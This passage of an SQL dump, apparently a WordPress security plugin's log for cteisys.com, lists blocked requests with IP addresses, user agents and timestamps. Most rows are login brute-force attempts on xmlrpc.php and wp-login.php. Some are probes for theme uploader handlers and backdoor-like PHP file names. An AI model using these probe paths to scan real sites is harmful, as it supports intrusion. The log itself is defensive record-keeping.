Firefox\\/96\"}','YX8EZQizCyl0N2agVeKmdhUG',0,1664479253.5343,18685,'','POST',403,0,515,0,1,'',0),('208.109.39.235',3496814571,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qjWtzIvgPL5NVK0EQAXUOdwC',0,1664479335.8673,1260,'','POST',403,0,515,0,1,'',0),('119.8.58.8',1997027848,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','VENiXLYglDzHIFm0ueKfbp2a',0,1664479568.5721,1707,'','POST',403,0,515,0,1,'',0),('136.243.11.143',2297629583,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','VhbnxNWLY9mRws4idjpHG5Kc',0,1664479659.0794,1252,'','POST',403,0,515,0,1,'',0),('111.90.145.188',1868206524,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dk6XpzoBmqtnMWEA0PrK1Gjv',0,1664479917.7449,1246,'','POST',403,0,515,0,1,'',0),('107.189.14.89',1807552089,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','DLM04QhFKvYOdICT8Eyc7Nbn',0,1664479931.0807,487,'','POST',403,0,600,0,1,'',0),('192.81.214.91',3226588763,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6y0ou9vX2QGRhcIeUY4WlTs7',0,1664480002.0023,3355,'','POST',403,0,515,0,1,'',0),('107.189.6.184',1807550136,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\\/5.0)\"}','YEfRGPOK5uDChx4MenU1vw87',0,1664480508.7044,1196,'','POST',403,0,600,0,1,'',0),('198.98.50.216',3328324312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','XdMmkDL4uCPTlqVJNE3KFhRi',0,1664482485.5273,1351,'','POST',403,0,600,0,1,'',0),('209.141.44.126',3515690110,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','0scYty8DZaJvqfNbKIhPrFux',0,1664484328.6717,526,'','POST',403,0,600,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','EGvSph30UWidQnqP2stNxKya',0,1664499978.8381,1419,'','POST',403,0,600,0,1,'',0),('141.98.102.187',2372036283,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','65jZEbCmJ4z9sMqKvUHRtipQ',0,1664500930.8422,18688,'','POST',403,0,515,0,1,'',0),('185.206.225.51',3117343027,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','MHp9qWNRm4U7AZzEsti1Ydjo',0,1664505999.7977,18513,'','POST',403,0,515,0,1,'',0),('209.141.44.126',3515690110,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.78.2 (KHTML, like Gecko) Version\\/7.0.6 Safari\\/537.78.2\"}','qJCI6cYGXW759pAa04LMZ2kE',0,1664508560.0563,17369,'','POST',403,0,600,0,1,'',0),('184.75.221.163',3091979683,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','pNmy0vBqJrPZ9CMIdaA13w4f',0,1664508687.0095,19164,'','POST',403,0,515,0,1,'',0),('194.38.20.161',3257275553,'','http://cteisys.com/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php','','{\"1\":\"ALittle Client\"}','mWtXGzualeNg0Q9cKEbwr837',0,1664508848.1695,12296,'','GET',403,0,700,0,1,'',0),('20.199.113.4',348614916,'','https://cteisys.com/wp-includes/class-index-wordpress.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','Muq0kOGl392Hyd5FLQRTt8Ca',0,1664510746.0743,12179,'','GET',403,0,700,0,1,'',0),('20.199.113.4',348614916,'','https://cteisys.com/wp-admin/js/widgets/wp-login.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','aBgWRP8lKNmTewzxOiMfsrh5',0,1664510760.3009,306,'','GET',403,0,700,0,1,'',0),('20.199.113.4',348614916,'','https://cteisys.com/wp-includes/wp-system-cloud.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','IUO8TLDkpb3xsGHiun1QtwBS',0,1664510762.4676,310,'','GET',403,0,700,0,1,'',0),('20.199.113.4',348614916,'','https://cteisys.com/wp-includes/class-wp-page-icon.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','cGtHhQJz0SLxeKjZ3yIvbTi8',0,1664510764.6301,292,'','GET',403,0,700,0,1,'',0),('20.199.113.4',348614916,'','https://cteisys.com/wp-includes/class-wordpress-license.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','zHm9cUPAhQqfDFjgX437i5xM',0,1664510766.7212,322,'','GET',403,0,700,0,1,'',0),('37.120.217.243',628677107,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','5laRxOKgce7FpjSBIqZbsdQU',0,1664510971.7112,10939,'','POST',403,0,515,0,1,'',0),('152.89.160.131',2556010627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','bTdSa4oHpLF0c7sNWyGYwB3m',0,1664511665.1355,19264,'','POST',403,0,515,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','mGs2pDvk5EY3LwH6joIqWOZU',0,1664512101.6600,16692,'','POST',403,0,600,0,1,'',0),('213.152.161.5',3583549701,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','9mIlju1E2HTz6beQtp0x5i3w',0,1664516316.6109,5684,'','POST',403,0,515,0,1,'',0),('104.244.77.192',1760841152,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.75.14 (KHTML, like Gecko) Version\\/7.0.3 Safari\\/537.75.14\"}','1qPYOjWEnbM9HQ3rR5ysdcpB',0,1664517722.2271,1814,'','POST',403,0,600,0,1,'',0),('103.171.181.53',1739306293,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vlTLPis8JFnAOtEpjbzgaCQy',0,1664517750.2729,1730,'','POST',403,0,515,0,1,'',0),('194.233.67.171',3270067115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','oELWGUOpIT2F04mx3B59DZiY',0,1664518318.9593,19274,'','POST',403,0,515,0,1,'',0),('107.189.14.89',1807552089,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','hzgdlx4kPbI2fMGmTWtCO7Qq',0,1664518588.0396,13475,'','POST',403,0,600,0,1,'',0),('103.74.120.192',1732933824,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','C5TaeisQfK6Stlq4zyxYh1Zv',0,1664519053.7437,18960,'','POST',403,0,515,0,1,'',0),('96.47.229.59',1613751611,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','cfLZRpBNIjlxTdumDakFEgSP',0,1664520029.0296,19495,'','POST',403,0,515,0,1,'',0),('131.255.7.10',2214528778,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GzmV3WhLQqSjaTn1YA9fIrue',0,1664520325.8284,4425,'','POST',403,0,515,0,1,'',0),('139.99.69.189',2338538941,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vJ7fzknqwl2oPpLKFU5DbV0W',0,1664520920.3483,18373,'','POST',403,0,515,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\\/537.77.4 (KHTML, like Gecko) Version\\/6.1.5 Safari\\/537.77.4\"}','xnNsfcWg0PGzwlTOJ693FYBj',0,1664521438.8033,17818,'','POST',403,0,600,0,1,'',0),('37.187.24.159',633018527,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QA3xFPHkOaGylm4J1UbzZndX',0,1664522248.0673,18445,'','POST',403,0,515,0,1,'',0),('101.99.90.175',1701010095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ahnJZ8b1X2vYx0KDmipsefRU',0,1664524321.7104,2533,'','POST',403,0,515,0,1,'',0),('82.102.27.195',1382423491,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','qadztOwY5rIEc64VsGLubFhM',0,1664524560.3194,2103,'','POST',403,0,515,0,1,'',0),('34.79.206.104',575655528,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iT6cfA17OClyGMPF5vhJgXRI',0,1664524917.7871,1633,'','POST',403,0,515,0,1,'',0),('207.244.248.44',3488938028,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XRCnvoF2YScWZ8mVUst91KOI',0,1664525677.6905,1382,'','POST',403,0,515,0,1,'',0),('142.93.157.162',2388499874,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xgP1ylbJucKkdha27ZrpIDXA',0,1664526280.3818,1580,'','POST',403,0,515,0,1,'',0),('124.70.98.118',2084987510,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wurBg83Kdpz65JlSvQmVyeOb',0,1664527038.4910,1679,'','POST',403,0,515,0,1,'',0),('92.119.178.3',1551348227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','kU0toWc57Y4Rb1BvadjiPKwf',0,1664527495.6005,7658,'','POST',403,0,515,0,1,'',0),('8.218.143.243',148541427,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mIqdays4BlhAPDrKUz8T9VQC',0,1664528970.0041,18647,'','POST',403,0,515,0,1,'',0),('40.122.149.171',679122347,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hlx9wuX5PFo4RYEKNaebkWGS',0,1664529735.7236,2377,'','POST',403,0,515,0,1,'',0),('51.159.15.23',866062103,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','v3GCla7SocQrMnZsPT9feK4t',0,1664530335.8738,18819,'','POST',403,0,515,0,1,'',0),('62.90.101.113',1046111601,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','G0mu7L1RhUabNMfFAcgID3QY',0,1664531094.0293,6982,'','POST',403,0,515,0,1,'',0),('41.93.82.7',693981703,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','x8sYmFiwVhZtSD63fbjIveCu',0,1664531700.9951,18708,'','POST',403,0,515,0,1,'',0),('209.141.46.253',3515690749,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','OexQ73ogHt1ATJfGDb9vspYM',0,1664532206.8023,1156,'','POST',403,0,600,0,1,'',0),('194.233.69.10',3270067466,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DpIuiS0y7NRUw5s4qCaLJZFk',0,1664532448.4522,18763,'','POST',403,0,515,0,1,'',0),('111.90.145.188',1868206524,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','h0VRqyezZpAcb8Q1vYTOs6wa',0,1664533041.4473,18021,'','POST',403,0,515,0,1,'',0),('198.98.51.74',3328324426,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','Ciy3OnvjVYNp4EIbXlw75gJ9',0,1664533339.2461,1166,'','POST',403,0,600,0,1,'',0),('159.89.170.41',2673453609,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','K2csTF3gtzwlLRo1YSIrJZ87',0,1664533821.1597,18966,'','POST',403,0,515,0,1,'',0),('109.234.161.93',1844093277,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ejrXCkoV7UNnEfzvyuOiL5PF',0,1664534439.2402,18449,'','POST',403,0,515,0,1,'',0),('205.185.117.143',3451483535,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','qPVuFAM9GsUi8cDTSHzl3Rje',0,1664534643.6250,1179,'','POST',403,0,600,0,1,'',0),('109.233.192.83',1844035667,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','m3gZyF68kXod7nPfxzIDU0je',0,1664535188.8914,14584,'','POST',403,0,515,0,1,'',0),('104.244.77.192',1760841152,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','tqc7e6pQ2FI9AsirVwERuSDN',0,1664535495.2579,1288,'','POST',403,0,600,0,1,'',0),('80.87.194.140',1347928716,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YKNtbvdpscCi5GVZTBrFHPog',0,1664537141.5643,18011,'','POST',403,0,515,0,1,'',0),('144.126.159.4',2424217348,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZCBGDpIfvWdYFs67LmPrQNOT',0,1664537597.9235,13853,'','POST',403,0,515,0,1,'',0),('185.197.195.173',3116745645,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fcpj2O3HUG5obBn48yIMXhtE',0,1664537841.2165,19152,'','POST',403,0,515,0,1,'',0),('51.79.30.143',860823183,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZT1wg5RWHvF7oCKhJMAnSykb',0,1664538254.8022,3787,'','POST',403,0,515,0,1,'',0),('108.179.253.75',1823735115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fzE23BQ4LSr6bw5RaxYMIUl0',0,1664538427.1724,1444,'','POST',403,0,515,0,1,'',0),('8.210.102.36',148006436,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yQOTqrcnbwoUJ4KNAlxSsZ3D',0,1664538631.1820,7286,'','POST',403,0,515,0,1,'',0),('80.87.194.140',1347928716,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1VIyqsEjQUdfKZOn3WDALarb',0,1664538820.8839,17075,'','POST',403,0,515,0,1,'',0),('178.128.156.230',2994773222,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tSJ1MWhBUXjokzmGcRPpqry9',0,1664539006.3490,2555,'','POST',403,0,515,0,1,'',0),('192.81.214.91',3226588763,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8jKlZNVpOEQbSgPdU5FtLnJm',0,1664539393.9960,19587,'','POST',403,0,515,0,1,'',0),('194.38.20.161',3257275553,'','http://cteisys.com/wp-content/themes/cameleonthemeforest/includes/fileuploader/upload_handler.php','','{\"1\":\"ALittle Client\"}','pE32SnByAH6uv1mcdZkOL7ef',0,1664539433.1588,440,'','GET',403,0,700,0,1,'',0),('185.33.54.15',3105961487,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EGr9XqLmeWfY0nQwvcA2VT7S',0,1664539567.8004,15178,'','POST',403,0,515,0,1,'',0),('5.101.156.45',90545197,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RrhHze2A38vFYGTEKNiykb0B',0,1664539795.6633,18321,'','POST',403,0,515,0,1,'',0),('15.235.138.120',267094648,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wm6EHsp07UBQzfujiX528ePW',0,1664540351.9609,18669,'','POST',403,0,515,0,1,'',0),('185.247.139.21',3120007957,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VKpy1u7c6qJ0jARn5tQ3HzxO',0,1664540569.6480,19254,'','POST',403,0,515,0,1,'',0),('101.0.73.142',1694517646,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qurGWAXhgabDpFN8OYEdQIzs',0,1664540725.6847,10351,'','POST',403,0,515,0,1,'',0),('93.114.235.167',1567812519,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','q3o2CWhSBDPM1I4dnHk5RlbK',0,1664541096.1747,19360,'','POST',403,0,515,0,1,'',0),('67.205.143.236',1137545196,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yPjiuO0VlLTKF6cbWqxGv52S',0,1664541294.8361,19188,'','POST',403,0,515,0,1,'',0),('128.199.60.194',2160540866,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eXMasvTyoE7SPLVYZiG91ADB',0,1664541430.0733,9440,'','POST',403,0,515,0,1,'',0),('198.98.50.216',3328324312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','OncRBaPEow9j6xe0TtzlySXr',0,1664541562.8915,8034,'','POST',403,0,600,0,1,'',0),('45.14.224.167',755949735,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jo4AylnO0IzBgZDW1LpPi7FS',0,1664541628.5418,15602,'','POST',403,0,515,0,1,'',0),('167.99.54.31',2808296991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8xNBFMZgatKzhYQkv6piE9s5',0,1664541772.3727,18564,'','POST',403,0,515,0,1,'',0),('15.235.97.24',267084056,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','boTqEXpUIOZAre86n7NuWlih',0,1664541944.0463,18645,'','POST',403,0,515,0,1,'',0),('51.91.83.187',861623227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yMOVhza5nSdY0CGBQb7v4fHm',0,1664542281.3494,18661,'','POST',403,0,515,0,1,'',0),('144.126.140.17',2424212497,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0U4n6zks15vgaStrJhOXVEpf',0,1664542411.7136,11283,'','POST',403,0,515,0,1,'',0),('185.33.54.15',3105961487,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','f9x30Mryb8cHFBSLP5aAh7s6',0,1664542599.0551,18339,'','POST',403,0,515,0,1,'',0),('47.57.186.73',792312393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OVxnDrUhXzWgSopLe8TMQREb',0,1664542714.1668,6283,'','POST',403,0,515,0,1,'',0),('5.101.156.219',90545371,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','p5ZjJqQedW2btk4BfHVl0nz9',0,1664542906.8550,19920,'','POST',403,0,515,0,1,'',0),('101.0.73.142',1694517646,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AfTeKZO9RUNuFxCJlbVoLhD5',0,1664543028.0789,1460,'','POST',403,0,515,0,1,'',0),('213.149.103.132',3583338372,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3LBdKv9IEXiN7qew8YfJWha6',0,1664543217.5813,18487,'','POST',403,0,515,0,1,'',0),('124.70.98.118',2084987510,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mbq7NhcGrDLMI1vtf3isdVoY',0,1664543668.0437,18704,'','POST',403,0,515,0,1,'',0),('37.187.24.159',633018527,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CiTZ9AfDEvLHIogedJyNmrWc',0,1664543827.6736,19783,'','POST',403,0,515,0,1,'',0),('35.193.197.89',599901529,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QcjqmlvfDCnKEZGiLz9xHyTw',0,1664543967.0073,15137,'','POST',403,0,515,0,1,'',0),('35.193.197.89',599901529,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5ZFCfUgLhJ2cR8E7NlrjYymH',0,1664544422.4668,18513,'','POST',403,0,515,0,1,'',0),('154.0.165.146',2583733650,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tcTshxiv2n80gzLYBF51CyjO',0,1664544548.5671,1455,'','POST',403,0,515,0,1,'',0),('199.201.110.199',3351867079,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 